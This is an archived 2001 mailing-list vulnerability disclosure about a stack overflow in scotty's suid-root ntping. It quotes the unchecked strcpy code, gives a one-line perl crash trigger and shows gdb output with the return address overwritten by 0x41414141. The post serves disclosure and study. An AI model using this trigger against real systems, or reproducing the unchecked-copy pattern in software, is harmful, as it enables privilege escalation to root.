Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

suid scotty / ntping overflow

From: KF <dotslash () snosoft com>
Date: Sat, 09 Jun 2001 13:15:51 -0400
here is the offending code and the attached letter has the general
information for this issue. 

in /home/d0tslash/scotty-2.1.0/tnm/ntping/ntping.c 

char *hname;                        /* hostname */   
...
else {
        char tmp [512];
        struct hostent *hp;
        strcpy (tmp, hname);
        #ifdef HAVE__RES
        /* try to spend no longer than some seconds: */
        _res.retrans = 1, _res.retry = 3;
        #endif
        if ((hp = gethostbyname (tmp)))
...
  
also ... I believe this is a second issue? difference here is with the
.'s in the input 
it crashes at make_addr() instead of gethostbyname() (see original
message)
... 
if (4 == sscanf (hname, "%d.%d.%d.%d", &a, &b, &c, &d))  
{
                naddr = (a << 24) | (b << 16) | (c << 8) | d;
                naddr = ntohl (naddr);
                /** XXX hack alert - but what the heck ;-) **/


[root@linux ntping]# gdb ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-mandrake-linux"...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40051b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40051b66 in getenv () from /lib/libc.so.6
#1  0x40112adb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x401139de in __res_ninit () from /lib/libc.so.6
#3  0x40116b69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x40117f5f in gethostbyname () from /lib/libc.so.6
#5  0x08049338 in make_addr ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141


-------- Original Message --------
Subject: suid scotty advisory soon
Date: Thu, 07 Jun 2001 19:05:01 -0400
From: KF <dotslash () snosoft com>
To: recon () snosoft com

Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/

What led me to research this:
arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:

  i run scotty-testsuite: what must i change on my system:(Linux
  slackware): 
  ==== Test generated error:
  can not connect straps socket: Permission denied

straps and ntping must be installed suid root.

^------- Hrmm I sure thought that was interesting to know *grin*

Vendors affected:
unknown by the author of this document 

just a note I found however...

<19990702221232.79B119410 () Galois suse de>
Hi folks,
here is the long promised posting of all suid/sgid files on a alpha of
SuSE
Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so thats the reason for the
many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x   1 root     root        33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x   1 root     root        18352 Jun 30 11:11 ./usr/bin/straps
...

real world example:
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40079b66 in getenv () from /lib/libc.so.6
#1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x4013b9de in __res_ninit () from /lib/libc.so.6
#3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5  0x080495b8 in _start ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

-KF
Previous By Date Next
Previous By Thread Next

Current thread: